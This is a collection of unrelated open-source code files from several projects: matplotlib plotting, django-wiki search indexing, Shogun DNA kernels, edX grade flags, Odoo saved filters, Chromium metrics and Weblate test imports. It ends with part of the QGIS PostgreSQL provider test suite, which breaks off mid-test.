cscorley/doc2vec-feature-location | scripts/boxplots.py | 2 | 1180 |
# coding: utf-8
# In[1]:
import numpy as np
import matplotlib.pyplot as plt
import gensim
import src.main
# In[2]:
def get_all_ranks(project):
    """Collect rank lists for all six model/config combinations of *project*.

    Returns a 6-tuple of rank lists in plotting order:
    (release LDA, changeset LDA, temporal LDA,
     release LSI, changeset LSI, temporal LSI).
    Temporal ranks fall back to empty lists when no temporal results exist
    for the project.
    """
    r_lda = [x for x, y, z in src.main.read_ranks(project, 'release_lda')]
    r_lsi = [x for x, y, z in src.main.read_ranks(project, 'release_lsi')]
    c_lda = [x for x, y, z in src.main.read_ranks(project, 'changeset_lda')]
    c_lsi = [x for x, y, z in src.main.read_ranks(project, 'changeset_lsi')]
    try:
        t_lda = [x for x, y, z in src.main.read_ranks(project, 'temporal_lda')]
        t_lsi = [x for x, y, z in src.main.read_ranks(project, 'temporal_lsi')]
    except Exception:
        # Fix: the original bare ``except:`` also swallowed SystemExit and
        # KeyboardInterrupt; limit the best-effort fallback to ordinary errors.
        t_lda = []
        t_lsi = []

    return r_lda, c_lda, t_lda, r_lsi, c_lsi, t_lsi
# In[3]:
# Load every project configuration known to the experiment driver.
projects = src.main.load_projects()

# One boxplot per project comparing snapshot (S), changeset (C) and temporal
# (T) ranks for both LDA and LSI; figures are written under paper/figures/.
for project in projects:
    ranks = get_all_ranks(project)
    fig = plt.figure(dpi=300)
    fig.gca().boxplot(ranks,
                      labels=['S-LDA', 'C-LDA', 'T-LDA', 'S-LSI', 'C-LSI', 'T-LSI'])
    fig.gca().set_title(' '.join([project.name, project.version, project.level]))
    plt.savefig('paper/figures/' + project.name + project.version + project.level + '.png')
    plt.close()
plt.close()
# In[ ]:
| bsd-3-clause |
a-nai/django-wiki | wiki/plugins/haystack/search_indexes.py | 16 | 1113 | from __future__ import absolute_import
from __future__ import unicode_literals
from haystack import indexes
from wiki import models
class ArticleIndex(indexes.SearchIndex, indexes.Indexable):
    """Haystack search index over wiki Article objects, including the
    permission fields needed to filter results per user."""

    text = indexes.CharField(document=True, use_template=True)
    created = indexes.DateTimeField(model_attr='created')
    modified = indexes.DateTimeField(model_attr='modified')
    # default because indexing fails with whoosh. see.
    # http://stackoverflow.com/questions/11995367/how-do-i-use-a-boolean-field-in-django-haystack-search-query
    # https://github.com/toastdriven/django-haystack/issues/382
    other_read = indexes.BooleanField(model_attr='other_read', default=False)
    group_read = indexes.BooleanField(model_attr='group_read', default=False)
    # Owner/group ids are nullable: articles may have no owner or group.
    owner_id = indexes.IntegerField(model_attr='owner__id', null=True)
    group_id = indexes.IntegerField(model_attr='group__id', null=True)

    def get_model(self):
        """Return the model class this index is for."""
        return models.Article

    def index_queryset(self, using=None):
        """Used when the entire index for model is updated."""
        return self.get_model().objects.all()
| gpl-3.0 |
kostajaitachi/shogun | examples/undocumented/python_modular/preprocessor_sortulongstring_modular.py | 26 | 1464 | #!/usr/bin/env python
from tools.load import LoadMatrix
lm=LoadMatrix()

# DNA training/test sequences used by the example below.
traindna = lm.load_dna('../data/fm_train_dna.dat')
testdna = lm.load_dna('../data/fm_test_dna.dat')

# Each entry: (train, test, order, gap, reverse, use_sign).
parameter_list = [[traindna,testdna,4,0,False,False],[traindna,testdna,3,0,False,False]]
def preprocessor_sortulongstring_modular (fm_train_dna=traindna,fm_test_dna=testdna,order=3,gap=0,reverse=False,use_sign=False):
	"""Build sorted k-mer (ulong) string features from DNA sequences and
	compute a CommUlongString kernel.

	Returns (train kernel matrix, test kernel matrix, kernel).
	"""
	from modshogun import CommUlongStringKernel
	from modshogun import StringCharFeatures, StringUlongFeatures, DNA
	from modshogun import SortUlongString

	# Convert raw DNA chars into order-length ulong k-mer features.
	charfeat=StringCharFeatures(DNA)
	charfeat.set_features(fm_train_dna)
	feats_train=StringUlongFeatures(charfeat.get_alphabet())
	feats_train.obtain_from_char(charfeat, order-1, order, gap, reverse)

	charfeat=StringCharFeatures(DNA)
	charfeat.set_features(fm_test_dna)
	feats_test=StringUlongFeatures(charfeat.get_alphabet())
	feats_test.obtain_from_char(charfeat, order-1, order, gap, reverse)

	# The kernel requires sorted feature vectors; fit the preprocessor on
	# the training data and apply it to both sets.
	preproc=SortUlongString()
	preproc.init(feats_train)
	feats_train.add_preprocessor(preproc)
	feats_train.apply_preprocessor()
	feats_test.add_preprocessor(preproc)
	feats_test.apply_preprocessor()

	kernel=CommUlongStringKernel(feats_train, feats_train, use_sign)
	km_train=kernel.get_kernel_matrix()

	kernel.init(feats_train, feats_test)
	km_test=kernel.get_kernel_matrix()

	return km_train,km_test,kernel
if __name__=='__main__':
	# Run the example with the first parameter set when executed directly.
	print('CommUlongString')
	preprocessor_sortulongstring_modular(*parameter_list[0])
| gpl-3.0 |
appsembler/edx-platform | lms/djangoapps/grades/config/models.py | 12 | 3085 | """
Models for configuration of the feature flags
controlling persistent grades.
"""
from config_models.models import ConfigurationModel
from django.conf import settings
from django.db.models import BooleanField, IntegerField, TextField
from opaque_keys.edx.django.models import CourseKeyField
from six import text_type
from openedx.core.djangoapps.request_cache.middleware import request_cached
class PersistentGradesEnabledFlag(ConfigurationModel):
    """
    Enables persistent grades across the platform.
    When this feature flag is set to true, individual courses
    must also have persistent grades enabled for the
    feature to take effect.
    """
    # this field overrides course-specific settings to enable the feature for all courses
    enabled_for_all_courses = BooleanField(default=False)

    @classmethod
    @request_cached
    def feature_enabled(cls, course_id=None):
        """
        Looks at the currently active configuration model to determine whether
        the persistent grades feature is available.

        If the flag is not enabled, the feature is not available.
        If the flag is enabled and the provided course_id is for an course
        with persistent grades enabled, the feature is available.
        If the flag is enabled and no course ID is given,
        we return True since the global setting is enabled.
        """
        # Test settings short-circuit every other check.
        if settings.FEATURES.get('PERSISTENT_GRADES_ENABLED_FOR_ALL_TESTS'):
            return True
        if not PersistentGradesEnabledFlag.is_enabled():
            return False
        elif not PersistentGradesEnabledFlag.current().enabled_for_all_courses and course_id:
            # Per-course override: the most recent CoursePersistentGradesFlag
            # row for this course decides.
            effective = CoursePersistentGradesFlag.objects.filter(course_id=course_id).order_by('-change_date').first()
            return effective.enabled if effective is not None else False
        return True

    class Meta(object):
        app_label = "grades"

    def __unicode__(self):
        current_model = PersistentGradesEnabledFlag.current()
        return u"PersistentGradesEnabledFlag: enabled {}".format(
            current_model.is_enabled()
        )
class CoursePersistentGradesFlag(ConfigurationModel):
    """
    Enables persistent grades for a specific
    course. Only has an effect if the general
    flag above is set to True.
    """
    # One configuration row per course key.
    KEY_FIELDS = ('course_id',)

    class Meta(object):
        app_label = "grades"

    # The course that these features are attached to.
    course_id = CourseKeyField(max_length=255, db_index=True)

    def __unicode__(self):
        not_en = "Not "
        if self.enabled:
            not_en = ""
        # pylint: disable=no-member
        return u"Course '{}': Persistent Grades {}Enabled".format(text_type(self.course_id), not_en)
class ComputeGradesSetting(ConfigurationModel):
    """
    Configuration for batch grade computation: which courses to
    process (``course_ids``) and how many grades to handle per
    batch (``batch_size``).
    """
    class Meta(object):
        app_label = "grades"

    # Number of grades processed per batch.
    batch_size = IntegerField(default=100)
    course_ids = TextField(
        blank=False,
        help_text="Whitespace-separated list of course keys for which to compute grades."
    )
| agpl-3.0 |
Aravinthu/odoo | odoo/addons/base/ir/ir_filters.py | 16 | 7285 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import ast
from odoo import api, fields, models, tools, _
from odoo.exceptions import UserError
class IrFilters(models.Model):
    """Saved search filters: a (domain, context, sort) triple for a model,
    optionally private to one user and/or scoped to one window action."""
    _name = 'ir.filters'
    _description = 'Filters'
    _order = 'model_id, name, id desc'

    name = fields.Char(string='Filter Name', translate=True, required=True)
    user_id = fields.Many2one('res.users', string='User', ondelete='cascade', default=lambda self: self._uid,
                              help="The user this filter is private to. When left empty the filter is public "
                                   "and available to all users.")
    domain = fields.Text(default='[]', required=True)
    context = fields.Text(default='{}', required=True)
    sort = fields.Text(default='[]', required=True)
    model_id = fields.Selection(selection='_list_all_models', string='Model', required=True)
    is_default = fields.Boolean(string='Default Filter')
    action_id = fields.Many2one('ir.actions.actions', string='Action', ondelete='cascade',
                                help="The menu action this filter applies to. "
                                     "When left empty the filter applies to all menus "
                                     "for this model.")
    active = fields.Boolean(default=True)

    @api.model
    def _list_all_models(self):
        """Return (model, name) pairs for every installed model; used as
        the selection source for ``model_id``."""
        self._cr.execute("SELECT model, name FROM ir_model ORDER BY name")
        return self._cr.fetchall()

    @api.multi
    def copy(self, default=None):
        """Duplicate a single filter, suffixing its name with '(copy)'."""
        self.ensure_one()
        default = dict(default or {}, name=_('%s (copy)') % self.name)
        return super(IrFilters, self).copy(default)

    @api.multi
    def _get_eval_domain(self):
        """Parse this filter's ``domain`` string into a Python list."""
        self.ensure_one()
        return ast.literal_eval(self.domain)

    @api.model
    def _get_action_domain(self, action_id=None):
        """Return a domain component for matching filters that are visible in the
        same context (menu/view) as the given action."""
        if action_id:
            # filters specific to this menu + global ones
            return [('action_id', 'in', [action_id, False])]
        # only global ones
        return [('action_id', '=', False)]

    @api.model
    def get_filters(self, model, action_id=None):
        """Obtain the list of filters available for the user on the given model.

        :param action_id: optional ID of action to restrict filters to this action
            plus global filters. If missing only global filters are returned.
            The action does not have to correspond to the model, it may only be
            a contextual action.
        :return: list of :meth:`~osv.read`-like dicts containing the
            ``name``, ``is_default``, ``domain``, ``user_id`` (m2o tuple),
            ``action_id`` (m2o tuple) and ``context`` of the matching ``ir.filters``.
        """
        # available filters: private filters (user_id=uid) and public filters (uid=NULL),
        # and filters for the action (action_id=action_id) or global (action_id=NULL)
        action_domain = self._get_action_domain(action_id)
        filters = self.search(action_domain + [('model_id', '=', model), ('user_id', 'in', [self._uid, False])])
        # Read with the user's own context so translated names are returned.
        user_context = self.env.user.context_get()
        return filters.with_context(user_context).read(['name', 'is_default', 'domain', 'context', 'user_id', 'sort'])

    @api.model
    def _check_global_default(self, vals, matching_filters):
        """ _check_global_default(dict, list(dict)) -> None

        Checks if there is a global default for the model_id requested.

        If there is, and the default is different than the record being written
        (-> we're not updating the current global default), raise an error
        to avoid users unknowingly overwriting existing global defaults (they
        have to explicitly remove the current default before setting a new one)

        This method should only be called if ``vals`` is trying to set
        ``is_default``

        :raises odoo.exceptions.UserError: if there is an existing default and
                we're not updating it
        """
        domain = self._get_action_domain(vals.get('action_id'))
        defaults = self.search(domain + [
            ('model_id', '=', vals['model_id']),
            ('user_id', '=', False),
            ('is_default', '=', True),
        ])
        if not defaults:
            return
        if matching_filters and (matching_filters[0]['id'] == defaults.id):
            # The record being written IS the current global default.
            return
        raise UserError(_("There is already a shared filter set as default for %(model)s, delete or change it before setting a new default") % {'model': vals.get('model_id')})

    @api.model
    @api.returns('self', lambda value: value.id)
    def create_or_replace(self, vals):
        """Create the filter described by ``vals``, or overwrite the existing
        filter with the same (name, model, user) triple if one exists."""
        action_id = vals.get('action_id')
        current_filters = self.get_filters(vals['model_id'], action_id)
        matching_filters = [f for f in current_filters
                            if f['name'].lower() == vals['name'].lower()
                            # next line looks for matching user_ids (specific or global), i.e.
                            # f.user_id is False and vals.user_id is False or missing,
                            # or f.user_id.id == vals.user_id
                            if (f['user_id'] and f['user_id'][0]) == vals.get('user_id')]

        if vals.get('is_default'):
            if vals.get('user_id'):
                # Setting new default: any other default that belongs to the user
                # should be turned off
                domain = self._get_action_domain(action_id)
                defaults = self.search(domain + [
                    ('model_id', '=', vals['model_id']),
                    ('user_id', '=', vals['user_id']),
                    ('is_default', '=', True),
                ])
                if defaults:
                    defaults.write({'is_default': False})
            else:
                self._check_global_default(vals, matching_filters)

        # When a filter exists for the same (name, model, user) triple, we simply
        # replace its definition (considering action_id irrelevant here)
        if matching_filters:
            matching_filter = self.browse(matching_filters[0]['id'])
            matching_filter.write(vals)
            return matching_filter
        return self.create(vals)

    _sql_constraints = [
        # Partial constraint, complemented by unique index (see below). Still
        # useful to keep because it provides a proper error message when a
        # violation occurs, as it shares the same prefix as the unique index.
        ('name_model_uid_unique', 'unique (name, model_id, user_id, action_id)', 'Filter names must be unique'),
    ]

    @api.model_cr_context
    def _auto_init(self):
        """Create the table, then enforce case-insensitive name uniqueness."""
        result = super(IrFilters, self)._auto_init()
        # Use unique index to implement unique constraint on the lowercase name (not possible using a constraint)
        tools.create_unique_index(self._cr, 'ir_filters_name_model_uid_unique_action_index',
                                  self._table, ['lower(name)', 'model_id', 'COALESCE(user_id,-1)', 'COALESCE(action_id,-1)'])
        return result
| agpl-3.0 |
byterom/android_external_chromium_org | components/tools/metrics/browser_components_metrics.py | 89 | 2137 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generates the metrics collected weekly for the Browser Components project.
See
http://www.chromium.org/developers/design-documents/browser-components
for details.
"""
import os
import sys
# This is done so that we can import checkdeps. If not invoked as
# main, our user must ensure it is in PYTHONPATH.
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..', '..',
'buildtools', 'checkdeps'))
import count_ifdefs
import checkdeps
import results
# Preprocessor pattern to find OS_XYZ defines.
PREPROCESSOR_PATTERN = 'OS_[A-Z]+'
class BrowserComponentsMetricsGenerator(object):
  """Computes Browser Components metrics for a chrome/browser checkout."""

  def __init__(self, checkout_root):
    # checkout_root: path to the root of the Chromium checkout.
    self.checkout_root = checkout_root
    self.chrome_browser = os.path.join(checkout_root, 'chrome', 'browser')

  def CountIfdefs(self, skip_tests):
    """Counts OS_XYZ preprocessor conditionals under chrome/browser."""
    return count_ifdefs.CountIfdefs(
        PREPROCESSOR_PATTERN, self.chrome_browser, skip_tests)

  def CountViolations(self, skip_tests):
    """Counts intended DEPS violations (temp rules ignored) in chrome/browser."""
    deps_checker = checkdeps.DepsChecker(self.checkout_root,
                                         ignore_temp_rules=True,
                                         skip_tests=skip_tests)
    deps_checker.results_formatter = results.CountViolationsFormatter()
    deps_checker.CheckDirectory(os.path.join('chrome', 'browser'))
    return int(deps_checker.results_formatter.GetResults())
def main():
  """Prints all Browser Components metrics for this checkout to stdout."""
  generator = BrowserComponentsMetricsGenerator(
      os.path.join(os.path.dirname(__file__), '..', '..', '..'))
  print "All metrics are for chrome/browser.\n"
  print "OS ifdefs, all: %d" % generator.CountIfdefs(False)
  print "OS ifdefs, -tests: %d" % generator.CountIfdefs(True)
  print ("Intended DEPS violations, all: %d" %
         generator.CountViolations(False))
  print "Intended DEPS violations, -tests: %d" % generator.CountViolations(True)
  return 0


if __name__ == '__main__':
  sys.exit(main())
| bsd-3-clause |
power12317/weblate | weblate/trans/tests/__init__.py | 1 | 1330 | # -*- coding: utf-8 -*-
#
# Copyright © 2012 - 2013 Michal Čihař <michal@cihar.com>
#
# This file is part of Weblate <http://weblate.org/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from weblate.trans.tests.test_diff import *
from weblate.trans.tests.test_checks import *
from weblate.trans.tests.test_format_checks import *
from weblate.trans.tests.test_source_checks import *
from weblate.trans.tests.test_chars_checks import *
from weblate.trans.tests.test_same_checks import *
from weblate.trans.tests.test_consistency_checks import *
from weblate.trans.tests.test_markup_checks import *
from weblate.trans.tests.test_models import *
from weblate.trans.tests.test_views import *
from weblate.trans.tests.test_commands import *
| gpl-3.0 |
rduivenvoorde/QGIS | tests/src/python/test_provider_postgres.py | 2 | 134441 | # -*- coding: utf-8 -*-
"""QGIS Unit tests for the postgres provider.
Note: to prepare the DB, you need to run the sql files specified in
tests/testdata/provider/testdata_pg.sh
Read tests/README.md about writing/launching tests with PostgreSQL.
Run with ctest -V -R PyQgsPostgresProvider
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
from builtins import next
__author__ = 'Matthias Kuhn'
__date__ = '2015-04-23'
__copyright__ = 'Copyright 2015, The QGIS Project'
import qgis # NOQA
import psycopg2
import os
import time
from datetime import datetime
from qgis.core import (
QgsVectorLayer,
QgsVectorLayerExporter,
QgsFeatureRequest,
QgsFeature,
QgsFieldConstraints,
QgsDataProvider,
NULL,
QgsVectorLayerUtils,
QgsSettings,
QgsTransactionGroup,
QgsReadWriteContext,
QgsRectangle,
QgsDefaultValue,
QgsCoordinateReferenceSystem,
QgsProject,
QgsWkbTypes,
QgsGeometry,
QgsProviderRegistry,
QgsVectorDataProvider,
QgsDataSourceUri,
QgsProviderConnectionException,
)
from qgis.gui import QgsGui, QgsAttributeForm
from qgis.PyQt.QtCore import QDate, QTime, QDateTime, QVariant, QDir, QObject, QByteArray, QTemporaryDir
from qgis.PyQt.QtWidgets import QLabel
from qgis.testing import start_app, unittest
from qgis.PyQt.QtXml import QDomDocument
from utilities import unitTestDataPath, compareWkt
from providertestbase import ProviderTestCase
# Start the QGIS application once for the whole test module.
QGISAPP = start_app()
TEST_DATA_DIR = unitTestDataPath()
class TestPyQgsPostgresProvider(unittest.TestCase, ProviderTestCase):
    @classmethod
    def setUpClass(cls):
        """Run before all tests"""
        # Connection string defaults to the qgis_test service; can be
        # overridden via the QGIS_PGTEST_DB environment variable.
        cls.dbconn = 'service=qgis_test'
        if 'QGIS_PGTEST_DB' in os.environ:
            cls.dbconn = os.environ['QGIS_PGTEST_DB']
        # Create test layers
        cls.vl = QgsVectorLayer(
            cls.dbconn +
            ' sslmode=disable key=\'pk\' srid=4326 type=POINT table="qgis_test"."someData" (geom) sql=',
            'test', 'postgres')
        assert cls.vl.isValid()
        cls.source = cls.vl.dataProvider()
        cls.poly_vl = QgsVectorLayer(
            cls.dbconn +
            ' sslmode=disable key=\'pk\' srid=4326 type=POLYGON table="qgis_test"."some_poly_data" (geom) sql=',
            'test', 'postgres')
        assert cls.poly_vl.isValid()
        cls.poly_provider = cls.poly_vl.dataProvider()
        QgsGui.editorWidgetRegistry().initEditors()
        # Direct psycopg2 connection used to set up fixtures via raw SQL.
        cls.con = psycopg2.connect(cls.dbconn)
    @classmethod
    def tearDownClass(cls):
        """Run after all tests"""
        # No explicit teardown is performed here.
    def execSQLCommand(self, sql):
        """Execute a single SQL statement on the test connection and commit it."""
        self.assertTrue(self.con)
        cur = self.con.cursor()
        self.assertTrue(cur)
        cur.execute(sql)
        cur.close()
        self.con.commit()
    def getSource(self):
        """Recreate and repopulate the qgis_test."editData" table and return
        a layer on it; used as a fresh source for edit tests."""
        # create temporary table for edit tests
        self.execSQLCommand(
            'DROP TABLE IF EXISTS qgis_test."editData" CASCADE')
        self.execSQLCommand(
            'CREATE TABLE qgis_test."editData" ( pk SERIAL NOT NULL PRIMARY KEY, cnt integer, name text, name2 text, num_char text, dt timestamp without time zone, "date" date, "time" time without time zone, geom public.geometry(Point, 4326))')
        self.execSQLCommand("INSERT INTO qgis_test.\"editData\" (pk, cnt, name, name2, num_char, dt, \"date\", \"time\", geom) VALUES "
                            "(5, -200, NULL, 'NuLl', '5', TIMESTAMP '2020-05-04 12:13:14', '2020-05-02', '12:13:01', '0101000020E61000001D5A643BDFC751C01F85EB51B88E5340'),"
                            "(3, 300, 'Pear', 'PEaR', '3', NULL, NULL, NULL, NULL),"
                            "(1, 100, 'Orange', 'oranGe', '1', TIMESTAMP '2020-05-03 12:13:14', '2020-05-03', '12:13:14', '0101000020E61000006891ED7C3F9551C085EB51B81E955040'),"
                            "(2, 200, 'Apple', 'Apple', '2', TIMESTAMP '2020-05-04 12:14:14', '2020-05-04', '12:14:14', '0101000020E6100000CDCCCCCCCC0C51C03333333333B35140'),"
                            "(4, 400, 'Honey', 'Honey', '4', TIMESTAMP '2021-05-04 13:13:14', '2021-05-04', '13:13:14', '0101000020E610000014AE47E17A5450C03333333333935340')")
        vl = QgsVectorLayer(
            self.dbconn +
            ' sslmode=disable key=\'pk\' srid=4326 type=POINT table="qgis_test"."editData" (geom) sql=',
            'test', 'postgres')
        return vl
def getEditableLayer(self):
return self.getSource()
def getEditableLayerWithCheckConstraint(self):
"""Returns the layer for attribute change CHECK constraint violation"""
return QgsVectorLayer(self.dbconn + ' sslmode=disable key=\'id\' srid=4326 type=POINT table="public"."test_check_constraint" (geom) sql=', 'test_check_constraint', 'postgres')
def enableCompiler(self):
QgsSettings().setValue('/qgis/compileExpressions', True)
return True
def disableCompiler(self):
QgsSettings().setValue('/qgis/compileExpressions', False)
def uncompiledFilters(self):
return set(['"dt" = to_datetime(\'000www14ww13ww12www4ww5ww2020\',\'zzzwwwsswwmmwwhhwwwdwwMwwyyyy\')',
'"date" = to_date(\'www4ww5ww2020\',\'wwwdwwMwwyyyy\')',
'"time" = to_time(\'000www14ww13ww12www\',\'zzzwwwsswwmmwwhhwww\')'])
def partiallyCompiledFilters(self):
return set([])
    def getGeneratedColumnsData(self):
        """
        return a tuple with the generated column test layer and the expected generated value
        """
        cur = self.con.cursor()
        cur.execute("SHOW server_version_num")
        pgversion = int(cur.fetchone()[0])
        # don't trigger this test when PostgreSQL versions earlier than 12.
        if pgversion < 120000:
            return (None, None)
        else:
            return (QgsVectorLayer(self.dbconn + ' sslmode=disable table="qgis_test"."generated_columns"', 'test', 'postgres'),
                    """('test:'::text || ((pk)::character varying)::text)""")
# HERE GO THE PROVIDER SPECIFIC TESTS
    def testDefaultValue(self):
        """With EvaluateDefaultValues on, defaults are returned as values:
        serial pk -> int, no default -> NULL, text default -> its value."""
        self.source.setProviderProperty(
            QgsDataProvider.EvaluateDefaultValues, True)
        self.assertIsInstance(self.source.defaultValue(0), int)
        self.assertEqual(self.source.defaultValue(1), NULL)
        self.assertEqual(self.source.defaultValue(2), 'qgis')
        # Restore the provider property so other tests see the default setting.
        self.source.setProviderProperty(
            QgsDataProvider.EvaluateDefaultValues, False)
    def testDefaultValueClause(self):
        """With EvaluateDefaultValues off, defaults are returned as raw SQL
        clauses instead of evaluated values."""
        self.source.setProviderProperty(
            QgsDataProvider.EvaluateDefaultValues, False)
        self.assertEqual(self.source.defaultValueClause(
            0), 'nextval(\'qgis_test."someData_pk_seq"\'::regclass)')
        self.assertFalse(self.source.defaultValueClause(1))
        self.assertEqual(self.source.defaultValueClause(2), '\'qgis\'::text')
    def testDateTimeTypes(self):
        """date/time/timestamp columns map to QDate/QTime/QDateTime attributes."""
        vl = QgsVectorLayer('%s table="qgis_test"."date_times" sql=' % (
            self.dbconn), "testdatetimes", "postgres")
        self.assertTrue(vl.isValid())

        # Field types reported by the provider.
        fields = vl.dataProvider().fields()
        self.assertEqual(fields.at(fields.indexFromName(
            'date_field')).type(), QVariant.Date)
        self.assertEqual(fields.at(fields.indexFromName(
            'time_field')).type(), QVariant.Time)
        self.assertEqual(fields.at(fields.indexFromName(
            'datetime_field')).type(), QVariant.DateTime)

        # Attribute values of the first feature.
        f = next(vl.getFeatures(QgsFeatureRequest()))

        date_idx = vl.fields().lookupField('date_field')
        self.assertIsInstance(f.attributes()[date_idx], QDate)
        self.assertEqual(f.attributes()[date_idx], QDate(2004, 3, 4))
        time_idx = vl.fields().lookupField('time_field')
        self.assertIsInstance(f.attributes()[time_idx], QTime)
        self.assertEqual(f.attributes()[time_idx], QTime(13, 41, 52))
        datetime_idx = vl.fields().lookupField('datetime_field')
        self.assertIsInstance(f.attributes()[datetime_idx], QDateTime)
        self.assertEqual(f.attributes()[datetime_idx], QDateTime(
            QDate(2004, 3, 4), QTime(13, 41, 52)))
    def testBooleanType(self):
        """boolean columns map to QVariant.Bool and preserve NULL."""
        vl = QgsVectorLayer('{} table="qgis_test"."boolean_table" sql='.format(
            self.dbconn), "testbool", "postgres")
        self.assertTrue(vl.isValid())

        fields = vl.dataProvider().fields()
        self.assertEqual(
            fields.at(fields.indexFromName('fld1')).type(), QVariant.Bool)

        values = {feat['id']: feat['fld1'] for feat in vl.getFeatures()}
        expected = {
            1: True,
            2: False,
            3: NULL
        }
        self.assertEqual(values, expected)
    def testByteaType(self):
        """bytea columns map to QByteArray; read, update, insert and
        changeFeatures all round-trip binary data."""
        vl = QgsVectorLayer('{} table="qgis_test"."byte_a_table" sql='.format(
            self.dbconn), "testbytea", "postgres")
        self.assertTrue(vl.isValid())

        fields = vl.dataProvider().fields()
        self.assertEqual(fields.at(fields.indexFromName(
            'fld1')).type(), QVariant.ByteArray)

        values = {feat['id']: feat['fld1'] for feat in vl.getFeatures()}
        expected = {
            1: QByteArray(b'YmludmFsdWU='),
            2: QByteArray()
        }
        self.assertEqual(values, expected)

        # editing binary values
        self.execSQLCommand(
            'DROP TABLE IF EXISTS qgis_test."byte_a_table_edit" CASCADE')
        self.execSQLCommand(
            'CREATE TABLE qgis_test."byte_a_table_edit" ( pk SERIAL NOT NULL PRIMARY KEY, blobby bytea)')
        self.execSQLCommand("INSERT INTO qgis_test.\"byte_a_table_edit\" (pk, blobby) VALUES "
                            "(1, encode('bbb', 'base64')::bytea)")
        vl = QgsVectorLayer(
            self.dbconn + ' sslmode=disable table="qgis_test"."byte_a_table_edit" sql=',
            'test', 'postgres')
        self.assertTrue(vl.isValid())
        values = {feat['pk']: feat['blobby'] for feat in vl.getFeatures()}
        expected = {
            1: QByteArray(b'YmJi')
        }
        self.assertEqual(values, expected)

        # change attribute value
        self.assertTrue(vl.dataProvider().changeAttributeValues(
            {1: {1: QByteArray(b'bbbvx')}}))
        values = {feat['pk']: feat['blobby'] for feat in vl.getFeatures()}
        expected = {
            1: QByteArray(b'bbbvx')
        }
        self.assertEqual(values, expected)

        # add feature
        f = QgsFeature()
        f.setAttributes([2, QByteArray(b'cccc')])
        self.assertTrue(vl.dataProvider().addFeature(f))
        values = {feat['pk']: feat['blobby'] for feat in vl.getFeatures()}
        expected = {
            1: QByteArray(b'bbbvx'),
            2: QByteArray(b'cccc')
        }
        self.assertEqual(values, expected)

        # change feature
        self.assertTrue(vl.dataProvider().changeFeatures(
            {2: {1: QByteArray(b'dddd')}}, {}))
        values = {feat['pk']: feat['blobby'] for feat in vl.getFeatures()}
        expected = {
            1: QByteArray(b'bbbvx'),
            2: QByteArray(b'dddd')
        }
        self.assertEqual(values, expected)
    def testCitextType(self):
        """citext columns map to QVariant.String; read, update, insert and
        changeFeatures all round-trip the text values."""
        vl = QgsVectorLayer('{} table="qgis_test"."citext_table" sql='.format(
            self.dbconn), "testbytea", "postgres")
        self.assertTrue(vl.isValid())

        fields = vl.dataProvider().fields()
        self.assertEqual(
            fields.at(fields.indexFromName('fld1')).type(), QVariant.String)

        values = {feat['id']: feat['fld1'] for feat in vl.getFeatures()}
        expected = {
            1: 'test val',
            2: NULL
        }
        self.assertEqual(values, expected)

        # editing citext values
        self.execSQLCommand(
            'DROP TABLE IF EXISTS qgis_test."citext_table_edit" CASCADE')
        self.execSQLCommand(
            'CREATE TABLE qgis_test."citext_table_edit" ( pk SERIAL NOT NULL PRIMARY KEY, txt citext)')
        self.execSQLCommand("INSERT INTO qgis_test.\"citext_table_edit\" (pk, txt) VALUES "
                            "(1, 'text')")
        vl = QgsVectorLayer(
            self.dbconn + ' sslmode=disable table="qgis_test"."citext_table_edit" sql=',
            'test', 'postgres')
        self.assertTrue(vl.isValid())
        values = {feat['pk']: feat['txt'] for feat in vl.getFeatures()}
        expected = {
            1: 'text'
        }
        self.assertEqual(values, expected)

        # change attribute value
        self.assertTrue(
            vl.dataProvider().changeAttributeValues({1: {1: 'teeeext'}}))
        values = {feat['pk']: feat['txt'] for feat in vl.getFeatures()}
        expected = {
            1: 'teeeext'
        }
        self.assertEqual(values, expected)

        # add feature
        f = QgsFeature()
        f.setAttributes([2, 'teeeeeeeeeext'])
        self.assertTrue(vl.dataProvider().addFeature(f))
        values = {feat['pk']: feat['txt'] for feat in vl.getFeatures()}
        expected = {
            1: 'teeeext',
            2: 'teeeeeeeeeext'
        }
        self.assertEqual(values, expected)

        # change feature
        self.assertTrue(vl.dataProvider().changeFeatures(
            {2: {1: 'teeeeeeeeeeeeeeeeeeeeeeext'}}, {}))
        values = {feat['pk']: feat['txt'] for feat in vl.getFeatures()}
        expected = {
            1: 'teeeext',
            2: 'teeeeeeeeeeeeeeeeeeeeeeext'
        }
        self.assertEqual(values, expected)
    def testQueryLayers(self):
        """A layer built on a SQL subquery with a composite key is valid."""
        def test_query(dbconn, query, key):
            # Quotes inside the query must be escaped in the layer URI.
            ql = QgsVectorLayer(
                '%s srid=4326 table="%s" (geom) key=\'%s\' sql=' % (
                    dbconn, query.replace('"', '\\"'), key), "testgeom",
                "postgres")
            self.assertTrue(ql.isValid(), '{} ({})'.format(query, key))

        test_query(self.dbconn,
                   '(SELECT NULL::integer "Id1", NULL::integer "Id2", NULL::geometry(Point, 4326) geom LIMIT 0)',
                   '"Id1","Id2"')
    def testWkbTypes(self):
        """Geometries of every 2D/3D WKB type table round-trip to the expected WKT."""
        def test_table(dbconn, table_name, wkt):
            vl = QgsVectorLayer('%s srid=4326 table="qgis_test".%s (geom) sql=' % (dbconn, table_name), "testgeom",
                                "postgres")
            self.assertTrue(vl.isValid())
            for f in vl.getFeatures():
                self.assertEqual(f.geometry().asWkt(), wkt)

        test_table(self.dbconn, 'p2d', 'Polygon ((0 0, 1 0, 1 1, 0 1, 0 0))')
        test_table(self.dbconn, 'p3d',
                   'PolygonZ ((0 0 0, 1 0 0, 1 1 0, 0 1 0, 0 0 0))')
        test_table(self.dbconn, 'triangle2d', 'Polygon ((0 0, 1 0, 1 1, 0 0))')
